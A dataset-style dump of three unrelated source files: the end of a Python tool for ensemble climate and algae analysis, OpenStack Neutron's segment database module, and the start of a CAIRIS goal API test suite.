print(" - The end date is earlier than the start date")
sys.exit()
print("Number of ensembles:", ens)
if analysis:
print("Analysis: ", analysis)
a_ = ' '.join(analysis)
argv = argv + ' -a ' + a_
check_analysis(analysis)
if spatial:
print("Spatial analysis option selected.")
argv = argv + ' -sp'
if total:
print("Total ensemble stats option selected.")
argv = argv + ' -t'
if plot:
print("Plotting option selected.")
argv = argv + ' -p ' + str(plot[0])
else:
plot = None
if monthly:
print("Monthly date expected.")
argv = argv + ' -m'
if grid:
if len(grid) == 2:
lat, lon = grid[0], grid[1]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0]) + ' ' + str(grid[1])
elif len(grid) == 1:
check_sample_grid_one_arg(grid, 'user_entry')
points_sample_grid = grid[0]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0])
else:
print("ERROR in function user_entry: Grid point argument has invalid number of arguments.")
sys.exit()
elif sample:
if len(sample) == 2:
lat, lon = sample[0], sample[1]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0]) + ' ' + str(sample[1])
elif len(sample) == 1:
check_sample_grid_one_arg(sample, 'user_entry')
points_sample_grid = sample[0]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0])
else:
print("ERROR in function user_entry: Sample point argument has invalid number of arguments.")
sys.exit()
if mask:
if isinstance(mask, list):
mask = mask[0]
print("Masking grid option selected.")
argv = argv + ' -mk ' + mask
elif not mask:
mask = None
if output:
print("Save analysis data output selected.")
argv = argv + ' -o'
if covary:
print("Co-varying option selected.")
argv = argv + ' -cv'
check_variables_covary(varbs)
if not hist:
hist = ['fd']
elif hist:
argv = argv + ' -ht ' + str(hist[0])
if len(hist) == 2:
argv = argv + ' ' + str(hist[1])
elif len(hist) > 2:
print("ERROR in function user_entry: Histogram argument has invalid number of arguments.")
sys.exit()
print("Histogram bin selection option:", hist)
if func:
print("User function given: " + str(func[0]) + ", " + str(func[1]))
argv = argv + ' -u ' + func[0] + ' ' + func[1]
if calc_areas:
print("Calculate areas option selected.")
argv = argv + ' -ca'
if index and not second_date_given:
print("ERROR in function user_entry: Index must be given with a second start date set.")
sys.exit()
if index:
print("Index option selected: " + index)
argv = argv + ' -i'
if lon_centre:
lon_centre = lon_centre[0]
print("Longitude centering option selected.")
argv = argv + ' -lc ' + str(lon_centre)
elif not lon_centre:
lon_centre = None
start = [day_s, mon_s, yr_s]
end = [day_e, mon_e, yr_e]
if second_date_given:
start2 = [day_s2, mon_s2, yr_s2]
end2 = [day_e2, mon_e2, yr_e2]
progress.update()
if index:
calculate_index(algae_type, index, varbs, start, end, start2, end2, monthly=monthly, test=True)
progress.update()
progress.finish()
sys.exit()
extract = Extract(algae_type[0], varbs, start, end, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved, ens_files, abs_files, full_saved, dim_coords = extract.extract_data()
saved2, ens_files2, abs_files2, full_saved2 = None, None, None, None
if second_date_given:
at = None
if len(algae_type) == 2:
at = algae_type[1]
else:
at = algae_type[0]
extract = Extract(at, varbs, start2, end2, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved2, ens_files2, abs_files2, full_saved2, _ = extract.extract_data()
progress.update()
anlys = Analysis(saved)
ens_stats, func_name, analysis_str, nan_indices = None, None, None, None
spat_calcs, spat_calcs2 = None, None
ens_stats2 = None
if func:
file_name, func_name = func[0], func[1]
ens_stats = anlys.compute_user_analysis(file_name, func_name)
else:
if second_date_given:
ens_stats, spat_calcs, spat_calcs2, analysis_str, nan_indices= anlys.calc_stats_difference(saved2, analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
else:
ens_stats, analysis_str, nan_indices = anlys.compute_stats_analysis(analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
if mask is not None and lat is not None:
print("WARNING: Please ensure that sample/grid point is in the masked region.")
progress.update()
try:
if plot is not None or output:
plot_ens_num = int(plot[0]) if plot is not None else 1
create_histogram(saved, ens_stats, start, end, varbs, sel=hist, monthly=monthly,
save_out=output, ens_num=plot_ens_num, cov=covary, mask=mask,
total=total, analysis_str=analysis_str, nan_indices=nan_indices, plot=plot,
second_date_given=second_date_given, start_date2=start2, end_date2=end2, spatial=spatial)
if plot is not None:
if analysis_str:
if func is None or not func:
plot_map_analysis(ens_stats, varbs, save_out=output, ens_num=plot_ens_num,
analysis_str=analysis_str, total=total,
second_date_given=second_date_given)
else:
print("WARNING: Map not plotted as user function is used.")
else:
plot_map(saved, varbs, save_out=output, ens_num=plot_ens_num, total=total,
second_date_given=second_date_given)
if analysis_str:
create_timeseries_analysis(ens_stats, start, end, varbs, analysis_str, monthly=monthly,
save_out=output, ens_num=plot_ens_num,
second_date_given=second_date_given, total=total, spatial=spatial,
calcs=spat_calcs, calcs2=spat_calcs2, plot=plot, start2=start2, end2=end2)
else:
create_timeseries(saved, start, end, varbs,
save_out=output, ens_num=plot_ens_num, func_name=func_name, monthly=monthly,
second_date_given=second_date_given, plot=plot)
progress.update()
except Exception as err:
print("Exception thrown in function user_entry when plotting: " + str(err))
if output:
wo = WriteOutput(ens_files, abs_files, ens_stats, analysis_str, varbs,
start, end, argv, saved, full_saved,
total=total, lon_centre=lon_centre,
mask=mask, lon=lon, lat=lat,
grid=grid, user_func=func_name,
points_sample_grid=points_sample_grid,
second_date_given=second_date_given, test=True)
wo.write_analysis_to_netcdf_file()
progress.update()
print("PROGRAM SUCCESSFUL - TERMINAL FINISHED.")
sys.stdout = old_stdout
log_file.close()
progress.finish()
print_end_statement()
if plot is not None:
plt.show()
| true | true |
f725eaa93df16bb582f142e4fc6adc97b25e4daf | 15,232 | py | Python | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | null | null | null | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright 2016 Hewlett Packard Enterprise Development, LP
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib.db import api as db_api
from neutron_lib.db import resource_extend
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import helpers as log_helpers
from oslo_utils import uuidutils
from neutron.db import common_db_mixin
from neutron.db import segments_db as db
from neutron.extensions import segment as extension
from neutron import manager
from neutron.objects import base as base_obj
from neutron.objects import network
from neutron.services.segments import exceptions
_USER_CONFIGURED_SEGMENT_PLUGIN = None
def check_user_configured_segment_plugin():
global _USER_CONFIGURED_SEGMENT_PLUGIN
# _USER_CONFIGURED_SEGMENT_PLUGIN will contain 3 possible values:
# 1. None, this just happens during neutron-server startup.
# 2. True, this means that users configure the 'segments'
# service plugin in neutron config file.
# 3. False, this means that can not find 'segments' service
# plugin in neutron config file.
# This function just load once to store the result
# into _USER_CONFIGURED_SEGMENT_PLUGIN during neutron-server startup.
if _USER_CONFIGURED_SEGMENT_PLUGIN is None:
segment_class = 'neutron.services.segments.plugin.Plugin'
_USER_CONFIGURED_SEGMENT_PLUGIN = any(
p in cfg.CONF.service_plugins for p in ['segments', segment_class])
return _USER_CONFIGURED_SEGMENT_PLUGIN
class SegmentDbMixin(common_db_mixin.CommonDbMixin):
"""Mixin class to add segment."""
@staticmethod
def _make_segment_dict(segment_obj, fields=None):
res = {'id': segment_obj['id'],
'network_id': segment_obj['network_id'],
'name': segment_obj['name'],
'description': segment_obj['description'],
db.PHYSICAL_NETWORK: segment_obj[db.PHYSICAL_NETWORK],
db.NETWORK_TYPE: segment_obj[db.NETWORK_TYPE],
db.SEGMENTATION_ID: segment_obj[db.SEGMENTATION_ID],
'hosts': segment_obj['hosts'],
'segment_index': segment_obj['segment_index']}
resource_extend.apply_funcs('segments', res, segment_obj.db_obj)
return db_utils.resource_fields(res, fields)
def _get_segment(self, context, segment_id):
segment = network.NetworkSegment.get_object(context, id=segment_id)
if not segment:
raise exceptions.SegmentNotFound(segment_id=segment_id)
return segment
@log_helpers.log_method_call
def create_segment(self, context, segment):
"""Create a segment."""
segment = segment['segment']
segment_id = segment.get('id') or uuidutils.generate_uuid()
try:
new_segment = self._create_segment_db(context, segment_id, segment)
except db_exc.DBReferenceError:
raise n_exc.NetworkNotFound(net_id=segment['network_id'])
registry.notify(resources.SEGMENT, events.AFTER_CREATE, self,
context=context, segment=new_segment)
return self._make_segment_dict(new_segment)
def _create_segment_db(self, context, segment_id, segment):
with db_api.CONTEXT_WRITER.using(context):
network_id = segment['network_id']
physical_network = segment[extension.PHYSICAL_NETWORK]
if physical_network == constants.ATTR_NOT_SPECIFIED:
physical_network = None
network_type = segment[extension.NETWORK_TYPE]
segmentation_id = segment[extension.SEGMENTATION_ID]
if segmentation_id == constants.ATTR_NOT_SPECIFIED:
segmentation_id = None
name = segment['name']
if name == constants.ATTR_NOT_SPECIFIED:
name = None
description = segment['description']
if description == constants.ATTR_NOT_SPECIFIED:
description = None
args = {'id': segment_id,
'network_id': network_id,
'name': name,
'description': description,
db.PHYSICAL_NETWORK: physical_network,
db.NETWORK_TYPE: network_type,
db.SEGMENTATION_ID: segmentation_id}
# Calculate the index of segment
segment_index = 0
segments = self.get_segments(
context,
filters={'network_id': [network_id]},
fields=['segment_index'],
sorts=[('segment_index', True)])
if segments:
# NOTE(xiaohhui): The new index is the last index + 1, this
# may cause discontinuous segment_index. But segment_index
# can functionally work as the order index for segments.
segment_index = (segments[-1].get('segment_index') + 1)
args['segment_index'] = segment_index
new_segment = network.NetworkSegment(context, **args)
new_segment.create()
# Do some preliminary operations before committing the segment to
# db
registry.notify(
resources.SEGMENT, events.PRECOMMIT_CREATE, self,
context=context, segment=new_segment)
# The new segment might have been updated by the callbacks
# subscribed to the PRECOMMIT_CREATE event. So update it in the DB
new_segment.update()
return new_segment
@log_helpers.log_method_call
def update_segment(self, context, uuid, segment):
"""Update an existing segment."""
segment = segment['segment']
with db_api.CONTEXT_WRITER.using(context):
curr_segment = self._get_segment(context, uuid)
curr_segment.update_fields(segment)
curr_segment.update()
return self._make_segment_dict(curr_segment)
@log_helpers.log_method_call
def get_segment(self, context, uuid, fields=None):
segment_db = self._get_segment(context, uuid)
return self._make_segment_dict(segment_db, fields)
@log_helpers.log_method_call
def get_segments(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
filters = filters or {}
pager = base_obj.Pager(sorts, limit, page_reverse, marker)
segment_objs = network.NetworkSegment.get_objects(
context, _pager=pager, **filters)
return [self._make_segment_dict(obj) for obj in segment_objs]
@log_helpers.log_method_call
def get_segments_count(self, context, filters=None):
filters = filters or {}
return network.NetworkSegment.count(context, **filters)
@log_helpers.log_method_call
def get_segments_by_hosts(self, context, hosts):
if not hosts:
return []
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=hosts)
return list({mapping.segment_id for mapping in segment_host_mapping})
@log_helpers.log_method_call
def delete_segment(self, context, uuid, for_net_delete=False):
"""Delete an existing segment."""
segment_dict = self.get_segment(context, uuid)
# Do some preliminary operations before deleting the segment
registry.publish(resources.SEGMENT, events.BEFORE_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, metadata={
'for_net_delete': for_net_delete},
states=(segment_dict,),
resource_id=uuid))
# Delete segment in DB
with db_api.CONTEXT_WRITER.using(context):
if not network.NetworkSegment.delete_objects(context, id=uuid):
raise exceptions.SegmentNotFound(segment_id=uuid)
# Do some preliminary operations before deleting segment in db
registry.notify(resources.SEGMENT, events.PRECOMMIT_DELETE,
self.delete_segment, context=context,
segment=segment_dict)
registry.publish(resources.SEGMENT, events.AFTER_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, states=(segment_dict,),
resource_id=uuid))
@db_api.retry_if_session_inactive()
@lockutils.synchronized('update_segment_host_mapping')
def update_segment_host_mapping(context, host, current_segment_ids):
with db_api.CONTEXT_WRITER.using(context):
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=host)
previous_segment_ids = {
seg_host['segment_id'] for seg_host in segment_host_mapping}
for segment_id in current_segment_ids - previous_segment_ids:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
stale_segment_ids = previous_segment_ids - current_segment_ids
if stale_segment_ids:
for entry in segment_host_mapping:
if entry.segment_id in stale_segment_ids:
entry.delete()
def get_hosts_mapped_with_segments(context):
"""Get hosts that are mapped with segments.
L2 providers can use this method to get an overview of SegmentHostMapping,
and then delete the stale SegmentHostMapping.
"""
segment_host_mapping = network.SegmentHostMapping.get_objects(context)
return {row.host for row in segment_host_mapping}
def _get_phys_nets(agent):
configurations_dict = agent.get('configurations', {})
mappings = configurations_dict.get('bridge_mappings', {})
mappings.update(configurations_dict.get('interface_mappings', {}))
mappings.update(configurations_dict.get('device_mappings', {}))
return list(mappings.keys())
reported_hosts = set()
# NOTE: Module level variable of segments plugin. It should be removed once
# segments becomes a default plugin.
segments_plugin = None
def get_segments_with_phys_nets(context, phys_nets):
"""Get segments from physical networks.
L2 providers usually have information of hostname and physical networks.
They could use this method to get related segments and then update
SegmentHostMapping.
"""
phys_nets = list(phys_nets)
if not phys_nets:
return []
with db_api.CONTEXT_READER.using(context):
return network.NetworkSegment.get_objects(
context, physical_network=phys_nets)
def map_segment_to_hosts(context, segment_id, hosts):
"""Map segment to a collection of hosts."""
with db_api.CONTEXT_WRITER.using(context):
for host in hosts:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
def _update_segment_host_mapping_for_agent(resource, event, trigger,
payload=None):
plugin = payload.metadata.get('plugin')
agent = payload.desired_state
host = payload.metadata.get('host')
context = payload.context
check_segment_for_agent = getattr(plugin, 'check_segment_for_agent', None)
if (not check_user_configured_segment_plugin() or
not check_segment_for_agent):
return
phys_nets = _get_phys_nets(agent)
if not phys_nets:
return
start_flag = agent.get('start_flag', None)
if host in reported_hosts and not start_flag:
return
reported_hosts.add(host)
segments = get_segments_with_phys_nets(context, phys_nets)
current_segment_ids = {
segment['id'] for segment in segments
if check_segment_for_agent(segment, agent)}
update_segment_host_mapping(context, host, current_segment_ids)
registry.notify(resources.SEGMENT_HOST_MAPPING, events.AFTER_CREATE,
plugin, context=context, host=host,
current_segment_ids=current_segment_ids)
def _add_segment_host_mapping_for_segment(resource, event, trigger,
context, segment):
if not context.session.is_active:
# The session might be in partial rollback state, due to errors in
# peer callback. In that case, there is no need to add the mapping.
# Just return here.
return
if not segment.physical_network:
return
cp = directory.get_plugin()
check_segment_for_agent = getattr(cp, 'check_segment_for_agent', None)
if not check_user_configured_segment_plugin() or not hasattr(
cp, 'get_agents') or not check_segment_for_agent:
# not an agent-supporting plugin
registry.unsubscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
return
hosts = {agent['host'] for agent in cp.get_agents(context)
if check_segment_for_agent(segment, agent)}
map_segment_to_hosts(context, segment.id, hosts)
def _delete_segments_for_network(resource, event, trigger,
context, network_id):
admin_ctx = context.elevated()
global segments_plugin
if not segments_plugin:
segments_plugin = manager.NeutronManager.load_class_for_provider(
'neutron.service_plugins', 'segments')()
segments = segments_plugin.get_segments(
admin_ctx, filters={'network_id': [network_id]})
for segment in segments:
segments_plugin.delete_segment(admin_ctx, segment['id'],
for_net_delete=True)
def subscribe():
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_CREATE)
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_UPDATE)
registry.subscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
registry.subscribe(_delete_segments_for_network,
resources.NETWORK,
events.PRECOMMIT_DELETE)
subscribe()
| 42.311111 | 79 | 0.66787 |
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib.db import api as db_api
from neutron_lib.db import resource_extend
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import helpers as log_helpers
from oslo_utils import uuidutils
from neutron.db import common_db_mixin
from neutron.db import segments_db as db
from neutron.extensions import segment as extension
from neutron import manager
from neutron.objects import base as base_obj
from neutron.objects import network
from neutron.services.segments import exceptions
_USER_CONFIGURED_SEGMENT_PLUGIN = None
def check_user_configured_segment_plugin():
global _USER_CONFIGURED_SEGMENT_PLUGIN
if _USER_CONFIGURED_SEGMENT_PLUGIN is None:
segment_class = 'neutron.services.segments.plugin.Plugin'
_USER_CONFIGURED_SEGMENT_PLUGIN = any(
p in cfg.CONF.service_plugins for p in ['segments', segment_class])
return _USER_CONFIGURED_SEGMENT_PLUGIN
class SegmentDbMixin(common_db_mixin.CommonDbMixin):
@staticmethod
def _make_segment_dict(segment_obj, fields=None):
res = {'id': segment_obj['id'],
'network_id': segment_obj['network_id'],
'name': segment_obj['name'],
'description': segment_obj['description'],
db.PHYSICAL_NETWORK: segment_obj[db.PHYSICAL_NETWORK],
db.NETWORK_TYPE: segment_obj[db.NETWORK_TYPE],
db.SEGMENTATION_ID: segment_obj[db.SEGMENTATION_ID],
'hosts': segment_obj['hosts'],
'segment_index': segment_obj['segment_index']}
resource_extend.apply_funcs('segments', res, segment_obj.db_obj)
return db_utils.resource_fields(res, fields)
def _get_segment(self, context, segment_id):
segment = network.NetworkSegment.get_object(context, id=segment_id)
if not segment:
raise exceptions.SegmentNotFound(segment_id=segment_id)
return segment
@log_helpers.log_method_call
def create_segment(self, context, segment):
segment = segment['segment']
segment_id = segment.get('id') or uuidutils.generate_uuid()
try:
new_segment = self._create_segment_db(context, segment_id, segment)
except db_exc.DBReferenceError:
raise n_exc.NetworkNotFound(net_id=segment['network_id'])
registry.notify(resources.SEGMENT, events.AFTER_CREATE, self,
context=context, segment=new_segment)
return self._make_segment_dict(new_segment)
def _create_segment_db(self, context, segment_id, segment):
with db_api.CONTEXT_WRITER.using(context):
network_id = segment['network_id']
physical_network = segment[extension.PHYSICAL_NETWORK]
if physical_network == constants.ATTR_NOT_SPECIFIED:
physical_network = None
network_type = segment[extension.NETWORK_TYPE]
segmentation_id = segment[extension.SEGMENTATION_ID]
if segmentation_id == constants.ATTR_NOT_SPECIFIED:
segmentation_id = None
name = segment['name']
if name == constants.ATTR_NOT_SPECIFIED:
name = None
description = segment['description']
if description == constants.ATTR_NOT_SPECIFIED:
description = None
args = {'id': segment_id,
'network_id': network_id,
'name': name,
'description': description,
db.PHYSICAL_NETWORK: physical_network,
db.NETWORK_TYPE: network_type,
db.SEGMENTATION_ID: segmentation_id}
segment_index = 0
segments = self.get_segments(
context,
filters={'network_id': [network_id]},
fields=['segment_index'],
sorts=[('segment_index', True)])
if segments:
segment_index = (segments[-1].get('segment_index') + 1)
args['segment_index'] = segment_index
new_segment = network.NetworkSegment(context, **args)
new_segment.create()
registry.notify(
resources.SEGMENT, events.PRECOMMIT_CREATE, self,
context=context, segment=new_segment)
new_segment.update()
return new_segment
@log_helpers.log_method_call
def update_segment(self, context, uuid, segment):
segment = segment['segment']
with db_api.CONTEXT_WRITER.using(context):
curr_segment = self._get_segment(context, uuid)
curr_segment.update_fields(segment)
curr_segment.update()
return self._make_segment_dict(curr_segment)
@log_helpers.log_method_call
def get_segment(self, context, uuid, fields=None):
segment_db = self._get_segment(context, uuid)
return self._make_segment_dict(segment_db, fields)
@log_helpers.log_method_call
def get_segments(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
filters = filters or {}
pager = base_obj.Pager(sorts, limit, page_reverse, marker)
segment_objs = network.NetworkSegment.get_objects(
context, _pager=pager, **filters)
return [self._make_segment_dict(obj) for obj in segment_objs]
@log_helpers.log_method_call
def get_segments_count(self, context, filters=None):
filters = filters or {}
return network.NetworkSegment.count(context, **filters)
@log_helpers.log_method_call
def get_segments_by_hosts(self, context, hosts):
if not hosts:
return []
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=hosts)
return list({mapping.segment_id for mapping in segment_host_mapping})
@log_helpers.log_method_call
def delete_segment(self, context, uuid, for_net_delete=False):
segment_dict = self.get_segment(context, uuid)
registry.publish(resources.SEGMENT, events.BEFORE_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, metadata={
'for_net_delete': for_net_delete},
states=(segment_dict,),
resource_id=uuid))
with db_api.CONTEXT_WRITER.using(context):
if not network.NetworkSegment.delete_objects(context, id=uuid):
raise exceptions.SegmentNotFound(segment_id=uuid)
registry.notify(resources.SEGMENT, events.PRECOMMIT_DELETE,
self.delete_segment, context=context,
segment=segment_dict)
registry.publish(resources.SEGMENT, events.AFTER_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, states=(segment_dict,),
resource_id=uuid))
@db_api.retry_if_session_inactive()
@lockutils.synchronized('update_segment_host_mapping')
def update_segment_host_mapping(context, host, current_segment_ids):
with db_api.CONTEXT_WRITER.using(context):
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=host)
previous_segment_ids = {
seg_host['segment_id'] for seg_host in segment_host_mapping}
for segment_id in current_segment_ids - previous_segment_ids:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
stale_segment_ids = previous_segment_ids - current_segment_ids
if stale_segment_ids:
for entry in segment_host_mapping:
if entry.segment_id in stale_segment_ids:
entry.delete()
def get_hosts_mapped_with_segments(context):
segment_host_mapping = network.SegmentHostMapping.get_objects(context)
return {row.host for row in segment_host_mapping}
def _get_phys_nets(agent):
configurations_dict = agent.get('configurations', {})
mappings = configurations_dict.get('bridge_mappings', {})
mappings.update(configurations_dict.get('interface_mappings', {}))
mappings.update(configurations_dict.get('device_mappings', {}))
return list(mappings.keys())
reported_hosts = set()
segments_plugin = None
def get_segments_with_phys_nets(context, phys_nets):
phys_nets = list(phys_nets)
if not phys_nets:
return []
with db_api.CONTEXT_READER.using(context):
return network.NetworkSegment.get_objects(
context, physical_network=phys_nets)
def map_segment_to_hosts(context, segment_id, hosts):
with db_api.CONTEXT_WRITER.using(context):
for host in hosts:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
def _update_segment_host_mapping_for_agent(resource, event, trigger,
payload=None):
plugin = payload.metadata.get('plugin')
agent = payload.desired_state
host = payload.metadata.get('host')
context = payload.context
check_segment_for_agent = getattr(plugin, 'check_segment_for_agent', None)
if (not check_user_configured_segment_plugin() or
not check_segment_for_agent):
return
phys_nets = _get_phys_nets(agent)
if not phys_nets:
return
start_flag = agent.get('start_flag', None)
if host in reported_hosts and not start_flag:
return
reported_hosts.add(host)
segments = get_segments_with_phys_nets(context, phys_nets)
current_segment_ids = {
segment['id'] for segment in segments
if check_segment_for_agent(segment, agent)}
update_segment_host_mapping(context, host, current_segment_ids)
registry.notify(resources.SEGMENT_HOST_MAPPING, events.AFTER_CREATE,
plugin, context=context, host=host,
current_segment_ids=current_segment_ids)
def _add_segment_host_mapping_for_segment(resource, event, trigger,
context, segment):
if not context.session.is_active:
return
if not segment.physical_network:
return
cp = directory.get_plugin()
check_segment_for_agent = getattr(cp, 'check_segment_for_agent', None)
if not check_user_configured_segment_plugin() or not hasattr(
cp, 'get_agents') or not check_segment_for_agent:
registry.unsubscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
return
hosts = {agent['host'] for agent in cp.get_agents(context)
if check_segment_for_agent(segment, agent)}
map_segment_to_hosts(context, segment.id, hosts)
def _delete_segments_for_network(resource, event, trigger,
context, network_id):
admin_ctx = context.elevated()
global segments_plugin
if not segments_plugin:
segments_plugin = manager.NeutronManager.load_class_for_provider(
'neutron.service_plugins', 'segments')()
segments = segments_plugin.get_segments(
admin_ctx, filters={'network_id': [network_id]})
for segment in segments:
segments_plugin.delete_segment(admin_ctx, segment['id'],
for_net_delete=True)
def subscribe():
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_CREATE)
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_UPDATE)
registry.subscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
registry.subscribe(_delete_segments_for_network,
resources.NETWORK,
events.PRECOMMIT_DELETE)
subscribe()
| true | true |
f725eaff0d679e4b23a48f9e1c42ebd9f7f1365b | 8,673 | py | Python | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
@classmethod
def setUpClass(cls):
importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')
def setUp(self):
# region Class fields
self.logger = logging.getLogger(__name__)
self.existing_goal_name = 'Multi-Factor Authentication'
self.existing_category = 'Maintain'
self.existing_environment_name_1 = 'Stroke'
self.existing_environment_name_2 = 'Psychosis'
self.goal_class = Goal.__module__+'.'+Goal.__name__
self.to_delete_ids = []
# endregion
def test_get_all(self):
method = 'test_get_all'
rv = self.app.get('/api/goals?session_id=test')
goals = jsonpickle.decode(rv.data)
self.assertIsNotNone(goals, 'No results after deserialization')
self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
self.assertGreater(len(goals), 0, 'No goals in the dictionary')
self.logger.info('[%s] Goals found: %d', method, len(goals))
goal = goals.values()[0]
self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_get_by_name(self):
method = 'test_get_by_name'
url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
rv = self.app.get(url)
self.assertIsNotNone(rv.data, 'No response')
self.logger.debug('[%s] Response data: %s', method, rv.data)
goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(goal, 'No results after deserialization')
self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_delete(self):
method = 'test_delete'
url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
new_goal_body = self.prepare_json()
self.app.delete(url)
self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
self.logger.info('[%s] URL: %s', method, url)
rv = self.app.delete(url)
self.logger.info('[%s] Response data: %s', method, rv.data)
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s\n', method, message)
def test_post(self):
method = 'test_post'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d\n', method, env_id)
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
def test_put(self):
method = 'test_put'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
